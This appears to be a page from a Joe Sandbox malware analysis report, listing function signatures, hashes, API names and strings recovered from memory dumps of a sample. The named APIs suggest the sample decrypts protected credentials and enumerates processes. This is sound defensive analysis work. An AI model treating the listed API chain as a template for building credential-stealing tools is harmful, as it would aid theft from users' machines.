                                                                                                    • Instruction ID: ba40979cd59543eed5795cf3275f7b4dddbed25990aaf9e0961c0d99b1a6b731
                                                                                                    • Opcode Fuzzy Hash: eba47d0c810211a009f984e3ce810decee2d7cb9fb39a7e87e15bbee8ef19542
                                                                                                    • Instruction Fuzzy Hash: EEF05E01F1920659FE547EA15C0027592806F8C7A5FCC0EB0D83E852C1DE1CB4408A31
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo_noreturn$__std_exception_copy
                                                                                                    • String ID: parse_error
                                                                                                    • API String ID: 1944019136-3903021949
                                                                                                    • Opcode ID: fcb94c03f419076f135e2dbe65f80db248f198790addfddc5093c8d7142d05be
                                                                                                    • Instruction ID: a6c1d5841cfc883eb280cf51de6e8274b8608c63f3a81dfcd2d7329d027606cc
                                                                                                    • Opcode Fuzzy Hash: fcb94c03f419076f135e2dbe65f80db248f198790addfddc5093c8d7142d05be
                                                                                                    • Instruction Fuzzy Hash: 09A1D262F14B8189FB10EF64D4403BDA362EF59798F545771EA6C16A9AEF3CE180C350
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLastNameTranslate$CodeInfoLocalePageValidValue
                                                                                                    • String ID: utf8
                                                                                                    • API String ID: 3069159798-905460609
                                                                                                    • Opcode ID: 41343eb44851c0e8f8055f3926715ba520ae6846787d1c3cb08d70e80e5c003e
                                                                                                    • Instruction ID: 231a7cef627b8a0ad2bfb9838f01aa3eeb2e73ea107bbec07ade43c15214d2ad
                                                                                                    • Opcode Fuzzy Hash: 41343eb44851c0e8f8055f3926715ba520ae6846787d1c3cb08d70e80e5c003e
                                                                                                    • Instruction Fuzzy Hash: 64918832A0874285FB64BF21D4406B9ABE5EF48B84F8849B1DE5C47785DF3CE946C7A0
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 1239891234-0
                                                                                                    • Opcode ID: 518a55c6435702555d938cb12e0853557d9473da796008457dbc6bc20602c87e
                                                                                                    • Instruction ID: f110435c6b3375ff9606b483b37e5cdb6dacce862e61bdb72290d6315726757b
                                                                                                    • Opcode Fuzzy Hash: 518a55c6435702555d938cb12e0853557d9473da796008457dbc6bc20602c87e
                                                                                                    • Instruction Fuzzy Hash: 89316136A08F8186EB60DF25E8402AEB3A4FF88754F980576EA9D43B55DF3CD5458B10
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                    • String ID:
                                                                                                    • API String ID: 73155330-0
                                                                                                    • Opcode ID: 50477b883f0e595c475007deb4df5dd0632e30aba3648fc15433c39142537e7c
                                                                                                    • Instruction ID: 796a590d7fdc31b67e72544830e97e3a16393ba2472b38bf8cd8b9c879da19da
                                                                                                    • Opcode Fuzzy Hash: 50477b883f0e595c475007deb4df5dd0632e30aba3648fc15433c39142537e7c
                                                                                                    • Instruction Fuzzy Hash: C902C162B05B8685FB50EF61D4402ADB3A2EF48BD8F888272DE5D17789DF78E491C350
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Crypt$AlgorithmProvider$CloseGenerateOpenPropertySymmetric_invalid_parameter_noinfo_noreturn
                                                                                                    • String ID: content$filename$ios_base::badbit set
                                                                                                    • API String ID: 3077847781-879919306
                                                                                                    • Opcode ID: 0bcfc921bf75ea7deec6ca4cc914c8a148170ededc6ae36e3497172a60584761
                                                                                                    • Instruction ID: 3c471bf2813259d2123f49d3aaec9341fc23ace0c35f5618767866e61c4de1c3
                                                                                                    • Opcode Fuzzy Hash: 0bcfc921bf75ea7deec6ca4cc914c8a148170ededc6ae36e3497172a60584761
                                                                                                    • Instruction Fuzzy Hash: 1E82013251DBC695E6B19B14F8803EAB3A5FBC8740F945236DACD42B69EF38D594CB00
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CryptDecrypt
                                                                                                    • String ID:
                                                                                                    • API String ID: 2620231605-0
                                                                                                    • Opcode ID: a15f310f6230dab8b2c439189cf4db1ee8969c8c9a52d6e13aa6a1d9d343b1fb
                                                                                                    • Instruction ID: 7f6407fb750802aa762c4e816b10b67bd3fd97d13377cec24b15ec9d4e02a829
                                                                                                    • Opcode Fuzzy Hash: a15f310f6230dab8b2c439189cf4db1ee8969c8c9a52d6e13aa6a1d9d343b1fb
                                                                                                    • Instruction Fuzzy Hash: 09B18E62F08B819AF710DBA0D4103AE7BB2FB54B88F444279DE4C07A99DF7AD499C350
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InfoLocale$ErrorLastValue_invalid_parameter_noinfo
                                                                                                    • String ID:
                                                                                                    • API String ID: 1791019856-0
                                                                                                    • Opcode ID: 8cdfe7f1b5fd9999da327c4f4609675d5690c7bae2d768c40d9912784c01383a
                                                                                                    • Instruction ID: e634c58db7b428cb18282657359b084da1b00f7d50303ace9c7d8e620049a088
                                                                                                    • Opcode Fuzzy Hash: 8cdfe7f1b5fd9999da327c4f4609675d5690c7bae2d768c40d9912784c01383a
                                                                                                    • Instruction Fuzzy Hash: 77619232A085438AFB34AF11D5402B9B3E5FF48B44F888575CB9E93691DE3CE952C7A4
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CryptDataFreeLocalUnprotect_invalid_parameter_noinfo_noreturn
                                                                                                    • String ID:
                                                                                                    • API String ID: 2610421622-0
                                                                                                    • Opcode ID: d2c0388303d74805f7eb883b10ef3726e044cdd81ba6d4b10086cf51ecd7eca1
                                                                                                    • Instruction ID: 9d5664b43deae3c285cc9824ee8ec6ce74b2d2e72c7a870593b568b31a38bf8b
                                                                                                    • Opcode Fuzzy Hash: d2c0388303d74805f7eb883b10ef3726e044cdd81ba6d4b10086cf51ecd7eca1
                                                                                                    • Instruction Fuzzy Hash: C8619D32B18B81DAF710EF74E4403ACB3A2EB58B8CF444275EA4D56E8ADF78D5948350
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$EnumLocalesSystemValue
                                                                                                    • String ID:
                                                                                                    • API String ID: 3029459697-0
                                                                                                    • Opcode ID: b863ec2cec9009a3af30c9a1a615a32510d45c83cc126c9469ae93d30e306958
                                                                                                    • Instruction ID: d383905c11c800f9b5ee3485f7b257bc8132b68f3fe87e12cdeb8a1140ca5faf
                                                                                                    • Opcode Fuzzy Hash: b863ec2cec9009a3af30c9a1a615a32510d45c83cc126c9469ae93d30e306958
                                                                                                    • Instruction Fuzzy Hash: 00110263E186458AFB14AF16D0406A8BBE1FB58BA0F884532D629433C4CE68D6D1C790
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: EnumLocalesSystem
                                                                                                    • String ID:
                                                                                                    • API String ID: 2099609381-0
                                                                                                    • Opcode ID: 17140df511fe09419b9fc83be2d2c34c2fb9fdba42dd4bc62a26aeb66c77a399
                                                                                                    • Instruction ID: 08afad8601c871d80797c94381b3b922b15b4a9a97de3c5f7c465ecd66365acf
                                                                                                    • Opcode Fuzzy Hash: 17140df511fe09419b9fc83be2d2c34c2fb9fdba42dd4bc62a26aeb66c77a399
                                                                                                    • Instruction Fuzzy Hash: EAF06972A08B4192F700EF29E8801A9B766FF8CB80F988475EA4D83365CE3CD891C714
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: No closed word$key declared, but no value$key opened, but never closed$object is not closed with '}'$quote was opened but not closed.$unexpected '}'$unexpected key without object$word wasnt properly ended
                                                                                                    • API String ID: 0-2700065129
                                                                                                    • Opcode ID: 52e00e713b4374cc5988d93a8fc87872f5f7c514a267708eb114d8843e2f668e
                                                                                                    • Instruction ID: 7481e37447572ef5f67fe957d396b75999ea2578f905267d4976f5dde2c95bba
                                                                                                    • Opcode Fuzzy Hash: 52e00e713b4374cc5988d93a8fc87872f5f7c514a267708eb114d8843e2f668e
                                                                                                    • Instruction Fuzzy Hash: 7AB13E72908AC798F760FF20DC506E8B365FF58348FC45972D64D0A9A6DF289799C324
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseHandle$Process32Token$InformationNextOpenProcess$ConvertCreateErrorFirstLastSnapshotStringToolhelp32
                                                                                                    • String ID:
                                                                                                    • API String ID: 3925315391-0
                                                                                                    • Opcode ID: b7cdb7a7c6588e50aaab37c0fa57b8db1cd1071ffc72c1321cf755afb8342ce3
                                                                                                    • Instruction ID: 3eef6355a90c33f3ceaf850deb56cd66ac8acbb502870cd4402c4bc2fbe16156
                                                                                                    • Opcode Fuzzy Hash: b7cdb7a7c6588e50aaab37c0fa57b8db1cd1071ffc72c1321cf755afb8342ce3
                                                                                                    • Instruction Fuzzy Hash: 89817E32A18B4282F750AF22E85426AE7A5FF88B84F884575EE4E47B58DF7DD405CB10
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo_noreturn$__std_exception_destroy$ApisFile__std_fs_code_page
                                                                                                    • String ID: ", "$: "
                                                                                                    • API String ID: 1991941009-747220369
                                                                                                    • Opcode ID: b6bde7b0fd070ce518661ad40e676b058974f13f872575cb34e94787139c7c00
                                                                                                    • Instruction ID: 967f8026a18ced9b0fa694099b873bdea310b02ebd978d7dbd9d22754c72051a
                                                                                                    • Opcode Fuzzy Hash: b6bde7b0fd070ce518661ad40e676b058974f13f872575cb34e94787139c7c00
                                                                                                    • Instruction Fuzzy Hash: 25B1AD72B04B4589FB00EF65D4403BCA362EF48B88F8849B1DA5D17B99DF38D495C3A0
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Session$ListProcess$CurrentRegisterResourcesStart
                                                                                                    • String ID:
                                                                                                    • API String ID: 3299295986-0
                                                                                                    • Opcode ID: 4ddc3a5b4f8c6342cd3dcf0c0e78daa6693b2bbe667ef408570da53bc05ca548
                                                                                                    • Instruction ID: bf58f10631b0c2cfd10be7ccf236d44fb284b08c450f1f15d2fc171c852da0f3
                                                                                                    • Opcode Fuzzy Hash: 4ddc3a5b4f8c6342cd3dcf0c0e78daa6693b2bbe667ef408570da53bc05ca548
                                                                                                    • Instruction Fuzzy Hash: 5D513F32F08A428AF710DFA5E4506ADB7B2FF48B48F944579DE0E57B98DE38D8068750
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                    • String ID: csm$csm$csm
                                                                                                    • API String ID: 849930591-393685449
                                                                                                    • Opcode ID: 93094d183b60bcbe653e0156645cfa8f2fca202be6890cc91cb0939cc453230d
                                                                                                    • Instruction ID: b896d592dd79ccec896a24e6b83bd6f0336e6540b155ae7caf9f4044096a4b9d
                                                                                                    • Opcode Fuzzy Hash: 93094d183b60bcbe653e0156645cfa8f2fca202be6890cc91cb0939cc453230d
                                                                                                    • Instruction Fuzzy Hash: 8CD18E32A0874186FB20EF2594403BDB7A0FF89788F980975EA4D57B95DF3AE581C760
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo_noreturnstd::_$GetcollLocinfo::_Locinfo_ctorLockitLockit::_
                                                                                                    • String ID: bad locale name
                                                                                                    • API String ID: 2486341784-1405518554
                                                                                                    • Opcode ID: 010b7c5d2d8d49d9b8afaaa73245b9f2d98800797003595236599776179208ec
                                                                                                    • Instruction ID: 403eb6e28f3e1060f54e31e66c5a62bf9b8b34e64afd09059dcb09df33591474
                                                                                                    • Opcode Fuzzy Hash: 010b7c5d2d8d49d9b8afaaa73245b9f2d98800797003595236599776179208ec
                                                                                                    • Instruction Fuzzy Hash: EA91EF32B05B818AFB14AF74E4503ADB362EF48B88F884975DE4D17B89DF38D8518394
                                                                                                    APIs
                                                                                                    • FreeLibrary.KERNEL32(?,00000000,00007FF75A70E206,?,?,00000030,00007FF75A715408,?,?,?,?,?,?,?,?), ref: 00007FF75A70DCD8
                                                                                                    • GetProcAddress.KERNEL32(?,00000000,00007FF75A70E206,?,?,00000030,00007FF75A715408,?,?,?,?,?,?,?,?), ref: 00007FF75A70DCE4
                                                                                                    Strings
                                                                                                    Memory Dump Source
